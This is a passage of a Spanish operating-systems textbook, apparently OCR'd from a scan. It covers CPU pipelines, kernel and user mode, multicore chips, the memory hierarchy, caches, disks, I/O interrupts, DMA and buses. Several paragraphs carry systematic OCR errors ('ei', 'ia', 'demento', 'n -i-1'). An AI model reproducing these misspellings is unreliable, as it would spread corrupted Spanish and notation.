Cada vez que detiene un programa en ejecución, ei sistema operativo debe guardar todos ios regis¬ 
tros para poder restaurados cuando ei programa continúe su ejecución. 

Para mejorar ei rendimiento, ios diseñadores de CPUs abandonaron desde hace mucho tiempo 
ei modeio de obtener, decodificar y ejecutar una instrucción a ia vez. M uchas CPUs modernas cuen¬ 
tan con medios para ejecutar más de una instrucción ai mismo tiempo. Por ejempio, una CPU po¬ 
dría tener unidades separadas de obtención, decodificación y ejecución, de manera que mientras se 
encuentra ejecutando ia instrucción n, también podría estar decodificando ia instrucción n -i-1 y ob¬ 
teniendo ia instrucción n -i- 2. A dicha organización se ie conoce como canalización (pipeiine); ia 
figura l-7(a) iiustra una canaiización de tres etapas. Ei uso de canaiizaciones más grandes es co¬ 
mún. En ia mayoría de ios diseños de canaiizaciones, una vez que se ha obtenido una instrucción y 
se coi oca en ia canaiización, se debe ejecutar aún si ia instrucción anterior era una bifurcación con- 
dicionai que se tomó. Las canaiizaciones producen grandes doiores de cabeza a ios programadores 
de compiiadoresy de sistemas operativos, yaquequedan ai descubierto ias compiejidadesdeia má¬ 
quina subyacente. 

Aún más avanzada que ei diseño de una canaiización es ia CPU superescalar, que se muestra 
en ia figura l-7(b). En este diseño hay varias unidades de ejecución; por ejempio, una para ia arit- 
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(a) (b) 


Figura 1-7. (a) Canalización de tres etapas: (b)CPU superescalar. 


mética de enteros, una para la aritmética de punto flotante y otra para las operaciones Booleanas. 
Dos o más instrucciones se obtienen a la vez, se decodifican y se vacían en un búfer de contención 
hasta que puedan ejecutarse. Tan pronto como una unidad de ejecución se encuentre libre, busca en 
el búfer de contención para ver si hay una instrucción que pueda manejar; de ser así, saca la instruc¬ 
ción del búfer y la ejecuta. Una consecuencia de este diseño es que con frecuencia las instrucciones 
del programa se ejecutan en forma desordenada. En gran parte, es responsabilidad del hardware ase¬ 
gurarse de que el resultado producido sea el mismo que hubiera producido una implementación se- 
cuencial, pero una cantidad molesta de complejidad es impuesta al sistema operativo, como 
veremos más adelante. 

La mayoría de las CPU, con excepción de las extremadamente simples que se utilizan en los 
sistemas integrados, tienen dos modos: modo kernel y modo usuario, como dijimos antes. Por lo ge¬ 
neral, un bit en el PSW controla el modo. Al operar en modo kernel, la CPU puede ejecutar cual¬ 
quier instrucción de su conjunto de instrucciones y útil izar todas las características del hardware. El 
sistema operativo opera en modo kernel, lo cual le da acceso al hardware completo. 

En contraste, los programas de usuario operan en modo de usuario, el cual les permite ejecutar 
sólo un subconjunto de las instrucciones y les da acceso sólo a un subconjunto de las característi¬ 
cas. En general, no se permiten las instrucciones que implican operaciones de E/S y protección de 
la memoria en el modo usuario. Desde luego que también está prohibido asignar el bit de modo del 
PSW para entrar al modo kernel. 

Para obtener servicios del sistema operativo, un programa usuario debe lanzar una llamada al 
sistema (system cali), la cual se atrapa en el kernel e invoca al sistema operativo. La instrucción 
TRAP cambia del modo usuario al modo kernel e inicia el sistema operativo. Cuando se ha comple¬ 
tado el trabajo, el control se devuelve al programa de usuario en la instrucción que va después de 
la llamada al sistema. M ás adelante en este capítulo explicaremos los detalles acerca del mecanis¬ 
mo de llamadas al sistema, pero por ahora piense en él como un tipo especial de instrucción de lla¬ 
mada a procedimiento que tiene la propiedad adicional de cambiar del modo usuario al modo 
kernel. Como indicación sobre la tipografía, utilizaremos el tipo de letra Helvética en minúsculas 
para indicar las llamadas al sistema en el texto del libro, como se muestra a continuación: read. 

Vale la pena indicar que las computadoras tienen otros traps aparte de la instrucción para eje¬ 
cutar una llamada al sistema. La mayoría de los demás traps son producidos por el hardware para 
advertir acerca de una situación excepcional, tal como un intento de dividir entre 0 o un subdesbor- 
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damiento de punto flotante. En cualquier caso, el sistema operativo obtiene el control y debe deci¬ 
dir qué hacer. Algunas veces el programa debe terminarse con un error. Otras veces el error se pue¬ 
de ignorar (un número que provoque un subdesbordamiento puede establecerse en 0). Por último, 
cuando el programa anuncia por adelantado que desea manejar ciertos tipos de condiciones, puede 
devolvérsele el control para dejarlo resolver el problema. 

C hips con multihilamiento y multinúcleo 

La ley de M oore establece que el número de transistores en un chip se duplica cada 18 meses. Es¬ 
ta "ley" no es ningún tipo de ley de física, como la de la conservación del momento, sino una ob¬ 
servación hecha por Gordon Moore, cofundador de Intel, acerca de la velocidad con la que los 
ingenieros de procesos en las compañías de semiconductores pueden reducir sus transistores. La ley 
de M oore ha estado vigente durante tres décadas hasta hoy y se espera que siga así durante al me¬ 
nos una década más. 

La abundancia de transistores está ocasionando un problema: ¿qué se debe hacer con todos 
ellos? En párrafos anteriores vimos una solución: las arquitecturas superescalares, con múltiples 
unidades funcionales. Pero a medida que se incrementa el número de transistores, se puede hacer 
todavía más. Algo obvio por hacer es colocar cachés más grandes en el chip de la CPU y eso está 
ocurriendo, pero en cierto momento se llega al punto de rendimiento decreciente. 

El siguiente paso obvio es multiplicar no sólo las unidades funcionales, sino también parte de 
la lógica de control. El Pentium 4 y algunos otros chips de CPU tienen esta propiedad, conocida co¬ 
mo multihilamiento (multithreading) o hiperhilamiento (hyperthreading) (el nombre que puso In¬ 
tel al multihilamiento). Para una primera aproximación, lo que hace es permitir que la CPU 
contenga el estado dedos hilos de ejecución (threads) distintos y luego alterne entre uno y otro con 
una escala de tiempo en nanosegundos (un hilo de ejecución es algo así como un proceso ligero, 
que a su vez es un programa en ejecución; veremos los detalles sobre esto en el capítulo 2). Por 
ejemplo, si uno de los procesos necesita leer una palabra de memoria (que requiere muchos ciclos 
de reloj), una CPU con multihilamiento puede cambiar a otro hilo. El multihilamiento no ofrece un 
verdadero paralelismo. Sólo hay un proceso en ejecución a la vez, pero el tiempo de cambio entre 
un hilo y otro se reduce al orden de un nanosegundo. 

El multihilamiento tiene consecuencias para el sistema operativo, debido a que cada hilo apa¬ 
rece para el sistema operativo como una CPU separada. Considere un sistema con dos CPU reales, 
cada una con dos hilos. El sistema operativo verá esto como si hubiera cuatro CPU. Si hay suficien¬ 
te trabajo sólo para mantener ocupadas dos CPU en cierto punto en el tiempo, podría planificar de 
manera inadvertida dos hilos en la misma CPU, mientras que la otra CPU estaría completamente 
inactiva. Esta elección es mucho menos eficiente que utilizar un hilo en cada CPU. El sucesor del 
Pentium 4, conocido como arquitectura Core (y también Core 2), no tiene hiperhilamiento, pero In¬ 
tel ha anunciado que el sucesor del Core lo tendrá nuevamente. 

M ás allá del multihilamiento, tenemos chips de CPU con dos, cuatro o más procesadores com¬ 
pletos, o núcleos (cores) en su interior. Los chips de multinúcleo (multicore) de la figura 1-8 con¬ 
tienen efectivamente cuatro minichips en su interior, cada uno con su propia CPU independiente 
(más adelante hablaremos sobre las cachés). Para hacer uso de dicho chip multinúcleo se requiere 
en definitiva un sistema operativo multiprocesador. 
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Caché 

L1 


(a) 


(b) 


Figura 1-8. (a) U n chip de cuatro núcleos (quad-core) con una caché L2 compartida, 
(b) U n chip de cuatro núcleos con cachés L2 separadas. 


1.3.2 Memoria 

El segundo componente importante en cualquier computadora es la memoria. En teoría, una memo¬ 
ria debe ser en extremo rápida (más rápida que la velocidad de ejecución de una instrucción, de ma¬ 
nera que la memoria no detenga a la CPU), de gran tamaño y muy económica. Ninguna tecnología 
en la actualidad cumple con todos estos objetivos, por lo que se adopta una solución distinta. El sis¬ 
tema de memoria está construido como una jerarquía de capas, como se muestra en la figura 1-9. 
Las capas superiores tienen mayor velocidad, menor capacidad y mayor costo por bit que las capas 
inferiores, a menudo por factores de mil millones o más. 


Tiempo de acceso típico 


Capacidad típica 


1 nseg 

2 nseg 
10 nseg 
10 mseg 

100 seg 


Registros 

Caché 


Memoria principai 
Disco magnético 
Cinta magnética 


<1 KB 
4 MB 

512-2048 MB 
200-1000 GB 
400-800 GB 


Figura 1-9. U na común jerarquía de memoria. Los números son sólo aproximaciones. 


La capa superior consiste en los registros internos de la CPU. Están compuestos del mismo ma¬ 
terial que la CPU y, por ende, tienen la misma rapidez. En consecuencia no hay retraso a la hora 
de utilizarlos. La capacidad de almacenamiento disponible en estos registros es generalmente de 
32 X 32 bits en una CPU de 32 bits y de 64 x 64 bits en una CPU de 64 bits. M enos de 1 KB en 
ambos casos. Los programas deben administrar los registros (es decir, decidir qué deben guardar 
en ellos) por su cuenta, en el software. 
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El siguiente nivei es ia memoria caché, que ei hardware controia de manera parciai. La memoria 
principai se divide en líneas de caché, que por io generai son de 64 bytes, con direcciones de 0 a 63 
en ia iínea de caché 0, direcciones de 64 a 127 en ia iínea de caché 1 y así sucesivamente. Las iíneas 
de caché que se utiiizan con más frecuencia se mantienen en una caché de aitaveiocidad, ubicada den¬ 
tro o muy cerca de ia CPU. Cuando ei programa necesita ieer una paiabra de memoria, ei hardware de 
ia caché comprueba si ia iínea que se requiere se encuentra en ia caché. Si es así (a io cuai se ie cono¬ 
ce como acierto de caché), ia petición de ia caché se cumpie y no se envía una petición de memoria 
a través dei bus hacia ia memoria principai. Los aciertos de caché por io generai requieren un tiempo 
aproximado dedos cicios de reioj. Los fai i os de caché tienen que ir a memoria, con un castigo consi- 
derabie de tiempo. La memoria caché está iimitada en tamaño debido a su aito costo. Aigunas máqui¬ 
nas tienen dos o inciuso tres nivei es de caché, cada una más ienta y más grande que ia anterior. 

Ei uso de cachés juega un papei importante en muchas áreas de ias ciencias computacionaies, 
no sóio en ia caché de ias iíneas de RA M . Cada vez que hay un recurso extenso que se puede divi¬ 
dir en piezas, aigunas de ias cuaies se utiiizan con mucho más frecuencia que otras, a menudo se 
invoca a ia caché para mejorar ei rendimiento. Los sistemas operativos ia utiiizan todo ei tiempo. 
Por ejempio, ia mayoría de ios sistemas operativos mantienen (piezas de) ios archivos que se utiii¬ 
zan con frecuencia en ia memoria principai para evitar tener que obtenerios dei disco en forma 
repetida. De manera simiiar, ios resuitados de convertir nombres de rutas extensas tai es como 

/home/ast/proyectos/minixB/src/kernei/reioj.c 

a ia dirección en disco donde se encuentra ei archivo, se pueden coiocar en ia caché para evitar bús¬ 
quedas repetidas. Por úitimo, cuando una dirección de una página Web (URL) se convierte en una 
dirección de red (dirección IP), ei resuitado se puede poner en ia caché para usario a futuro (exis¬ 
ten muchos otros usos). 

En cuaiquier sistema de caché surgen con rapidez varias preguntas, inciuyendo: 

1. Cuándo se debe poner un nuevo demento en ia caché. 

2. En qué iínea de caché se debe poner ei nuevo demento. 

3. Qué demento se debe diminar de ia caché cuando se necesita una posición. 

4. Dónde se debe poner un demento recién desaiojado en ia memoria de mayor tamaño. 

No todas ias preguntas son reievantes para cada situación de uso de ia caché. Para poner iíneas de 
ia memoria principai en ia caché de ia CPU, por io generai se introduce un nuevo demento en ca¬ 
da faiio de caché. La iínea de caché a utiiizar se caicuia generaimente mediante ei uso de aigunos 
de ios bits de mayor orden de ia dirección de memoria a ia que se hace referencia. Por ejempio, con 
4096 iíneas de caché de 64 bytes y direcciones de 32 bits, ios bits dei 6 ai 17 podrían utiiizarse pa¬ 
ra especificar ia iínea de caché, siendo ios bits dei 0 ai 5 ei byte dentro de ia iínea de ia caché. En 
este caso, ei demento a quitar es ei mismo en ei que se coi ocan ios nuevos datos, pero en otros sis¬ 
temas podría ser otro. Por úitimo, cuando se vud ve a escribir una iínea de caché en i a memoria prin¬ 
cipai (si se ha modificado desde ia úitima vez que se puso en caché), ia posición en memoria donde 
se debe voiver a escribir se determina únicamente por i a dirección en cuestión. 

Las cachés son una idea tan útii que ias CPUs modernas tienen dos de dias. La cachéLlo de 
primer nivei está siempre dentro de ia CPU, y por io generai aiimenta ias instrucciones decodifica¬ 
das ai motor de ejecución de ia CPU. La mayoría de ios chips tienen una segunda caché L1 para ias 
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palabras de datos que se utilizan con frecuencia. Por lo general, las cachés L1 son de 16 KB cada 
una. Además, a menudo hay una segunda caché, conocida como caché L 2, que contiene vari os me- 
gabytes de palabras de memoria utilizadas recientemente. La diferencia entre las cachés L1 y L2 es¬ 
tá en la velocidad. El acceso a la caché L1 se realiza sin ningún retraso, mientras que el acceso a la 
caché L2 requiere un retraso de uno o dos ciclos de reloj. 

En los chips multinúcleo, los diseñadores deben decidir dónde deben colocar las cachés. En la fi¬ 
gura l-8(a) hay una sola caché L2 compartida por todos los núcleos: esta metodología se utiliza en los 
chips multinúcleo de Intel. En contraste, en la figura l-8(b) cada núcleo tiene su propia caché L 2; A M D 
utiliza esta metodología. Cada estrategia tiene sus pros y sus contras. Por ejemplo, la caché L 2 compar¬ 
tida de I ntel requiere un dispositivo controlador de caché más complicado, pero la manera en queA M D 
utiliza la caché hace más difícil la labor de mantener las cachés L2 consistentes. 

La memoria principal viene a continuación en la jerarquía de la figura 1-9. Es el "caballo de 
batalla" del sistema de memoria. Por lo general a la memoria principal se le conoce como RAM 
(Random Access M emory, M emoria de Acceso Aleatorio). Los usuarios de computadora antiguos 
algunas veces la llaman memoria de núcleo debido a que las computadoras en las décadas de 1950 
y 1960 utilizaban pequeños núcleos deferrita magnetizables para la memoria principal. En la ac¬ 
tualidad, las memorias contienen desde cientos de megabytes hasta varios gigabytes y su tamaño 
aumenta con rapidez. Todas las peticiones de la CPU que no se puedan satisfacer desde la caché pa¬ 
san a la memoria principal. 

Además déla memoria principal, muchas computadoras tienen una pequeña cantidad de memo¬ 
ria de acceso aleatorio no volátil. A diferencia de la RAM, la memoria no volátil no pierde su conte¬ 
nido cuando se desconecta la energía. La ROM (Read Oniy Memory, Memoria de sólo lectura) se 
programa en la fábrica y no puede modificarse después. Es rápida y económica. En algunas compu¬ 
tadoras, el cargador de arranque (bootstrap loader) que se utiliza para iniciar la computadora está 
contenido en la ROM .Además, algunas tarjetas de E/S vienen con ROM para manejar el control de 
los dispositivos de bajo nivel. 

La EEPROM (Electrically Erasable PROM, PROM eléctricamente borrable) y la memoria 
flash son también no volátiles, pero en contraste con la ROM se pueden borrar y volver a escribir 
datos en ellas. Sin embargo, para escribir en este tipo de memorias se requiere mucho más tiempo 
que para escribir en la RAM , por lo cual se utilizan en la misma forma que la ROM , sólo con la ca¬ 
racterística adicional de que ahora es posible corregir los errores en los programas que contienen, 
mediante la acción devolver a escribir datos en ellas en el campo de trabajo. 

La memoria flash también se utiliza comúnmente como el medio de almacenamiento en los dis¬ 
positivos electrónicos portátiles. Sirve como película en las cámaras digitales y como el disco en 
los reproductores de música portátiles, para nombrar sólo dos usos. La memoria flash se encuentra 
entre la RAM y el disco en cuanto a su velocidad. Además, a diferencia de la memoria en disco, si 
se borra demasiadas veces, se desgasta. 

Otro tipo más de memoria es CM OS, la cual es volátil. M uchas computadoras utilizan memo¬ 
ria CM OS para guardar la fecha y hora actuales. La memoria CM OS y el circuito de reloj que in¬ 
crementa la hora en esta memoria están energizados por una pequeña batería, por lo que la hora se 
actualiza en forma correcta aun cuando la computadora se encuentre desconectada. La memoria 
CMOS también puede contener los parámetros de configuración, como el disco del cual se debe ini¬ 
ciar el sistema. Se utiliza CMOS debido a que consume tan poca energía que la batería instalada en 
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la fábrica dura varios años. Sin embargo, cuando empieza a fallar puede parecer como si la compu¬ 
tadora tuviera la enfermedad deA Izheimer, olvidando cosas que ha sabido durante años, como des¬ 
de cuál disco duro se debe iniciar el sistema. 


1.3.3 Discos 

El siguiente lugar en la jerarquía corresponde al disco magnético (disco duro). El almacenamiento en 
disco es dos órdenes de magnitud más económico que la RA M por cada bit, y a menudo es dos órde¬ 
nes de magnitud más grande en tamaño también. El único problema es que el tiempo para acceder en 
forma aleatoria a los datos en ella es de cerca de tres órdenes de magnitud más lento. Esta baja veloci¬ 
dad se debe al hecho de que un disco es un dispositivo mecánico, como se muestra en la figura 1-10. 
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Figura 1-10. Estructura de una unidad de disco. 


U n disco consiste en uno o más platos que giran a 5400, 7200 o 10,800 rpm. U n brazo mecáni¬ 
co, con un punto de giro colocado en una esquina, se mueve sobre los platos de manera similar al 
brazo déla aguja en un viejo tocadiscos. La información se escribe en el disco en una serie de círcu¬ 
los concéntricos. En cualquier posición dada del brazo, cada una de las cabezas puede leer una re¬ 
gión anular conocida como pista (track). En conjunto, todas las pistas para una posición dada del 
brazo forman un cilindro (cylinder). 

Cada pista se divide en cierto número de sectores, por lo general de 512 bytes por sector. En los 
discos modernos, los cilindros exteriores contienen más sectores que los interiores. Para desplazar el 
brazo de un cilindro al siguiente se requiere aproximadamente 1 milisegundo. Para desplazar el brazo 
a un cilindro aleatoriamente se requieren por lo general de 5 a 10 milisegundos, dependiendo de la uni¬ 
dad. Una vez que el brazo se encuentra en la pista correcta, la unidad debe esperar a que el sector ne¬ 
cesario gire hacia abajo de la cabeza, con un retraso adicional de 5 a 10 milisegundos, dependiendo de 
las rpm déla unidad. Una vez que el sector está bajo la cabeza, la lectura o escritura ocurre a una velo¬ 
cidad de 50 M B/seg en los discos de bajo rendimiento hasta de 160 M B/seg en los discos más rápidos. 

M uchas computadoras presentan un esquema conocido como memoria virtual (virtual me- 
mory), el cual describiremos hasta cierto punto en el capítulo 3. Este esquema hace posible la 
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ejecución de programas más grandes que la memoria física al colocarlos en el disco y utilizar la me¬ 
moria principal como un tipo de caché para las partes que se ejecutan con más frecuencia. Este 
esquema requiere la reasignación de direcciones de memoria al instante, para convertir la dirección 
que el programa generó en la dirección física en la RAM en donde se encuentra la palabra. Esta 
asignación se realiza mediante una parte de la CPU conocida como M M U (M emory M anagement 
U nit, Unidad deAdministración de M emoria), como se muestra en la figura 1-6. 

La presencia de la caché y la M M U pueden tener un gran impacto en el rendimiento. En un sis¬ 
tema de multiprogramación, al cambiar de un programa a otro (lo que se conoce comúnmente co¬ 
mo cambio de contexto o context switch), puede ser necesario vaciar todos los bloques modificados 
de la caché y modificar los registros de asignación en la M M U. A mbas operaciones son costosas y 
los programadores se esfuerzan bastante por evitarlas. M ás adelante veremos algunas de las conse¬ 
cuencias de sus tácticas. 

1.3.4 Cintas 

La última capa de la jerarquía en la memoria es la cinta magnética. Este medio se utiliza con fre¬ 
cuencia como respaldo para el almacenamiento en disco y para contener conjuntos de datos muy 
extensos. Para acceder a una cinta, primero debe colocarse en un lector de cinta, ya sea que lo ha¬ 
ga una persona o un robot (el manejo automatizado de las cintas es común en las instalaciones con 
bases de datos enormes). Después la cinta tal vez tenga que embobinarse hacia delante para llegar 
al bloque solicitado. En general, este proceso podría tardar varios minutos. La gran ventaja de la 
cinta es que es en extremo económica por bit y removible, lo cual es importante para las cintas de 
respaldo que se deben almacenar fuera del sitio de trabajo para que puedan sobrevivir a los incen¬ 
dios, inundaciones, terremotos y otros desastres. 

La jerarquía de memoria que hemos descrito es la común, pero algunas instalaciones no tienen 
todas las capas o tienen unas cuantas capas distintas (como el disco óptico). A ún así, a medida que 
se desciende por todos las capas en la jerarquía, el tiempo de acceso aleatorio se incrementa en for¬ 
ma dramática, la capacidad aumenta de igual forma y el costo por bit baja considerablemente. En 
consecuencia, es probable que las jerarquías de memoria se utilicen por varios años más. 

1.3.5 Dispositivos de E/S 

La CPU y la memoria no son los únicos recursos que el sistema operativo debe administrar. Los 
dispositivos de E/S también interactúan mucho con el sistema operativo. Como vimos en la figu¬ 
ra 1-6, los dispositivos de E/S generalmente constan de dos partes: un dispositivo controlador y el 
dispositivo en sí. El dispositivo controlador es un chip o conjunto de chips que controla físicamen¬ 
te el dispositivo. Por ejemplo, acepta los comandos del sistema operativo para leer datos del dis¬ 
positivo y los lleva a cabo. 

En muchos casos, el control del dispositivo es muy complicado y detallado, por lo que el trabajo 
del chip o los chips del dispositivo controlador es presentar una interfaz más simple al sistema operati¬ 
vo (pero de todas formas sigue siendo muy complejo). Por ejemplo, un controlador de disco podría 
aceptar un comando para leer el sector 11,206 del disco 2; después, tiene que convertir este número de 
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sector lineal en un cilindro, sector y cabeza. Esta conversión se puede complicar por el hecho de que 
los cilindros exteriores tienen más sectores que los interiores y que algunos sectores defectuosos se han 
reasignado a otros. Posteriormente, el dispositivo controlador tiene que determinar en cuál cilindro se 
encuentra el brazo y darle una secuencia de pulsos para desplazarse hacia dentro o hacia fuera el núme¬ 
ro requerido de cilindros: tiene que esperar hasta que el sector apropiado haya girado bajo la cabeza, y 
después empieza a leer y almacenar los bits a medida que van saliendo de la unidad, eliminando el 
preámbulo y calculando la suma de verificación. Por último, tiene que ensamblar los bits entrantes en 
palabras y almacenarlos en la memoria. Para hacer todo este trabajo, a menudo los dispositivos contro¬ 
ladores consisten en pequeñas computadoras incrustadas que se programan para realizar su trabajo. 

La otra pieza es el dispositivo en sí. Los dispositivos tienen interfaces bastante simples, debi¬ 
do a que no pueden hacer mucho y también para estandarizarlas. Esto último es necesario de ma¬ 
nera que cualquier dispositivo controlador de disco IDE pueda manejar cualquier disco IDE, por 
ejemplo. IDE (Integrated Drive Electronics) significa Electrónica de unidades integradas y es el 
tipo estándar de disco en muchas computadoras. Como la interfaz real del dispositivo está oculta 
detrás del dispositivo controlador, todo lo que el sistema operativo ve es la interfaz para el disposi¬ 
tivo controlador, que puede ser bastante distinta de la interfaz para el dispositivo. 

Como cada tipo de dispositivo controlador es distinto, se requiere software diferente para con¬ 
trolar cada uno de ellos. El software que se comunica con un dispositivo controlador, que le propor¬ 
ciona comandos y acepta respuestas, se conoce como driver (controlador). Cada fabricante de 
dispositivos controladores tiene que suministrar un driver específico para cada sistema operativo en 
que pueda funcionar. Así, un escáner puede venir, por ejemplo, con drivers para Windows 2000, 
WindowsX P, Vista y Linux. 

Para utilizar el driver, se tiene que colocar en el sistema operativo de manera que pueda ejecu¬ 
tarse en modo kernel. En realidad, los drivers se pueden ejecutar fuera del kernel, pero sólo unos 
cuantos sistemas actuales admiten esta posibilidad debido a que se requiere la capacidad para per¬ 
mitir que un driver en espacio de usuario pueda acceder al dispositivo de una manera controlada, 
una característica que raras veces se admite. Hay tres formas en que el driver se pueda colocar en 
el kernel: la primera es volver a enlazar el kernel con el nuevo driver y después reiniciar el sistema 
(muchos sistemas UNIX antiguos trabajan de esta manera): la segunda es crear una entrada en un 
archivo del sistema operativo que le indique que necesita el driver y después reinicie el sistema, pa¬ 
ra que en el momento del arranque, el sistema operativo busque los drivers necesarios y los cargue 
(Windows funciona de esta manera): la tercera forma es que el sistema operativo acepte nuevos dri¬ 
vers mientras los ejecuta e instala al instante, sin necesidad de reiniciar. Esta última forma solía ser 
rara, pero ahora se está volviendo mucho más común. Los dispositivos conectadles en caliente (hot- 
pluggable), como los dispositivos USB e IEEE 1394 (que se describen a continuación) siempre ne¬ 
cesitan drivers que se cargan en forma dinámica. 

Todo dispositivo controlador tiene un número pequeño de registros que sirven para comunicar¬ 
se con él. Por ejemplo, un dispositivo controlador de disco con las mínimas características podría 
tener registros para especificar la dirección de disco, dirección de memoria, número de sectores e 
instrucción (lectura o escritura). Para activar el dispositivo controlador, el driver recibe un coman¬ 
do del sistema operativo y después lo traduce en los valores apropiados para escribirlos en los re¬ 
gistros del dispositivo. La colección de todos los registros del dispositivo forma el espacio de 
puertos de E/S, un tema al que regresaremos en el capítulo 5. 
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En ciertas computadoras, los registros de dispositivo tienen una correspondencia con el espacio 
de direcciones del sistema operativo (las direcciones que puede utilizar), de modo que se puedan leer 
y escribir en ellas como si fuera en palabras de memoria ordinarias. En dichas computadoras no se re¬ 
quieren instrucciones de E/S especiales y los programas de usuario pueden aislarse del hardware al no 
colocar estas direcciones de memoria dentro de su alcance (por ejemplo, mediante el uso de registros 
base y límite). En otras computadoras, los registros de dispositivo se colocan en un espacio de puer¬ 
tos de E/S especial, donde cada registro tiene una dirección de puerto. En estas máquinas hay instruc¬ 
ciones iN y ouT especiales disponibles en modo kernel que permiten a los drivers leer y escribir en los 
registros. El primer esquema elimina la necesidad de instrucciones de E/S especiales, pero utiliza par¬ 
te del espacio de direcciones. El segundo esquema no utiliza espacio de direcciones, pero requiere ins¬ 
trucciones especiales. A mbos sistemas se utilizan ampliamente. 

Las operaciones de entrada y salida se pueden realizar de tres maneras distintas. En el método 
más simple, un programa de usuario emite una llamada al sistema, que el kernel posteriormente tra¬ 
duce en una llamada al procedimiento para el driver apropiado. Después el driver inicia la E/S y per¬ 
manece en un ciclo estrecho, sondeando en forma continua al dispositivo para ver si ha terminado 
(por lo general hay un bit que indica si el dispositivo sigue ocupado). Una vez terminada la E/S, el 
driver coloca los datos (si los hay) en donde se necesitan y regresa. Después el sistema operativo de¬ 
vuelve el control al llamador. A este método se le conoce como espera ocupada y tiene la desven¬ 
taja de que mantiene ocupada la CPU sondeando al dispositivo hasta que éste termina. 

El segundo método consiste en que el driver inicie el dispositivo y le pida generar una interrup¬ 
ción cuando termine. En este punto el driver regresa. Luego, el sistema operativo bloquea el progra¬ 
ma llamador si es necesario y busca otro trabajo por hacer. Cuando el dispositivo controlador detecta 
el final de la transferencia, genera una interrupción para indicar que la operación se ha completado. 

Las interrupciones son muy importantes en los sistemas operativos, por lo cual vamos a exami¬ 
nar la idea con más detalle. En la figura l-ll(a) podemos ver un proceso de tres pasos para la E/S. En 
el paso 1, el driver indica al dispositivo controlador de disco lo que debe hacer, al escribir datos en sus 
registros de dispositivo. Después el dispositivo controlador inicia el dispositivo: cuando ha terminado 
de leer o escribir el número de bytes que debe transferir, alerta al chip controlador de interrupciones 
mediante el uso de ciertas líneas de bus en el paso 2. Si el controlador de interrupciones está prepara¬ 
do para aceptar la interrupción (lo cual podría no ser cierto si está ocupado con una de mayor priori¬ 
dad), utiliza un pin en el chip de CPU para informarlo, en el paso 3. En el paso 4, el controlador de 
interrupciones coloca el número del dispositivo en el bus, para que la CPU pueda leerlo y sepa cuál 
dispositivo acaba de terminar (puede haber muchos dispositivos funcionando al mismo tiempo). 

Una vez que la CPU ha decidido tomar la interrupción, el contador de programa y el PSW son 
típicamente agregados (pushed) en la pila actual y la CPU cambia al modo kernel. El número de 
dispositivo se puede utilizar como un índice en parte de la memoria para encontrar la dirección del 
manejador (handier) de interrupciones para este dispositivo. Esta parte de la memoria se conoce co¬ 
mo vector de interrupción. Una vez que el manejador de interrupciones (parte del driver para el 
dispositivo que está realizando la interrupción) ha iniciado, quita el contador de programa y el PSW 
de la pila y los guarda, para después consultar al dispositivo y conocer su estado. Cuando el mane¬ 
jador de interrupciones termina, regresa al programa de usuario que se estaba ejecutando previa¬ 
mente a la primera instrucción que no se había ejecutado todavía. Estos pasos se muestran en la 
figura l-ll(b). 
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Figura 1-11. (a) Los pasos para iniciar un dispositivo de E/S y obtener una interrup¬ 
ción. (b) Ei procesamiento de interrupciones invoiucra tomar ia interrupción, ejecutar 
ei manejador de interrupciones y regresar ai programa de usuario. 

El tercer método para realizar operaciones de E/S hace uso de un chip especial llamado DMA 
(D irect M emory Access: Acceso directo a memoria) que puede controlar el flujo de bits entre la me¬ 
moria y un dispositivo controlador sin la intervención constante de la CPU. La CPU configura el chip 
DM A, le indica cuántos bytes debe transferir, las direcciones de dispositivo y de memoria involucra¬ 
das, la instrucción y deja que haga su trabajo. Cuando el chip DMA termina genera una interrupción, 
la cual se maneja de la manera antes descrita. En el capítulo 5 discutiremos con más detalle sobre el 
hardware de DMA y de E/S, en general. 

A menudo, las interrupciones pueden ocurrir en momentos muy inconvenientes, por ejemplo 
mientras otro manejador de interrupciones se está ejecutando. Por esta razón, la CPU tiene una for¬ 
ma para deshabilitar las interrupciones y rehabilitarlas después. Mientras las interrupciones están 
deshabilitadas, cualquier dispositivo que termine continúa utilizando sus señales de interrupción, pe¬ 
ro la CPU no se interrumpe sino hasta que se vuelven a habilitar las interrupciones. Si varios dispo¬ 
sitivos termi nan mi entras I as i nterrupci ones están habi I i tadas, el control ador de i nterrupci ones deci de 
cuál debe dejar pasar primero, lo cual se basa generalmente en prioridades estáticas asignadas a ca¬ 
da dispositivo. El dispositivo de mayor prioridad gana. 

1.3.6 Buses 

La organización de la figura 1-6 se utilizó en las mi nicomputadoras durante años y también en la IBM 
PC original. Sin embargo, a medida que los procesadores y las memorias se hicieron más veloces, la 
habilidad de un solo bus (y sin duda, del bus de la IBM PC) de manejar todo el tráfico se forzaba has¬ 
ta el punto de quiebre. A Igo tenía que ceder. Como resultado se agregaron más buses, tanto para dis¬ 
positivos de E/S más rápidos como para el tráfico entre la CPU y la memoria. Como consecuencia de 
esta evolución, un sistema Pentium extenso tiene actualmente una apariencia similar a la figura 1-12. 

El sistema tiene ocho buses (caché, local, memoria, PCI, SCSI, USB, IDE elSA), cada uno con 
una velocidad de transferencia y función distintas. El sistema operativo debe estar al tanto de todos 
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Figura 1-12. La estructura de un sistema Pentium extenso. 


estos buses para su configuración y administración. Los dos buses principaies son ei bus ISA (In- 
dustry Standard Architecture, Arquitectura estándar de ia industria) de ia IBM PC originai y su 
sucesor, ei bus PCI (Peripherai Component Interconnect, Interconexión de componentes periféri¬ 
cos). Ei bus ISA (el bus original de la IBM PC/AT) opera a 8.33 M Hz y puede transferir 2 bytes 
a la vez, para una velocidad máxima de 16.67 M B/seg. Se incluye para mantener compatibilidad 
hacia atrás con las tarjetas de E/S antiguas y lentas. Los sistemas modernos lo omiten con frecuen¬ 
cia, pues ya es obsoleto. El bus PCI fue inventado por Intel como sucesor para el bus ISA. Puede 
operar a 66 M Hz y transferir 8 bytes a la vez, para lograr una velocidad de transferencia de datos 
de 528 M B/seg. La mayoría de los dispositivos de E/S de alta velocidad utilizan el bus PCI en la 
actualidad. Incluso algunas computadoras que no emplean procesadores Intel usan el bus PCI, de¬ 
bido al extenso número de tarjetas de E/S disponibles para este bus. Las nuevas computadoras es¬ 
tán saliendo al mercado con una versión actualizad del bus PCI, conocida como PCI Express. 

En esta configuración, la CPU se comunica con el chip puente PCI a través del bus local y el 
chip puente PCI se comunica con la memoria a través de un bus de memoria dedicado, que normal¬ 
mente opera a 100 M Hz. Los sistemas Pentium tienen una caché de nivel 1 en el chip y una caché 
de nivel 2 mucho mayor fuera del chip, conectada a la CPU mediante el bus de caché. 

Además, este sistema contiene tres buses especializados: IDE, USB y SCSI. El bus IDE sirve 
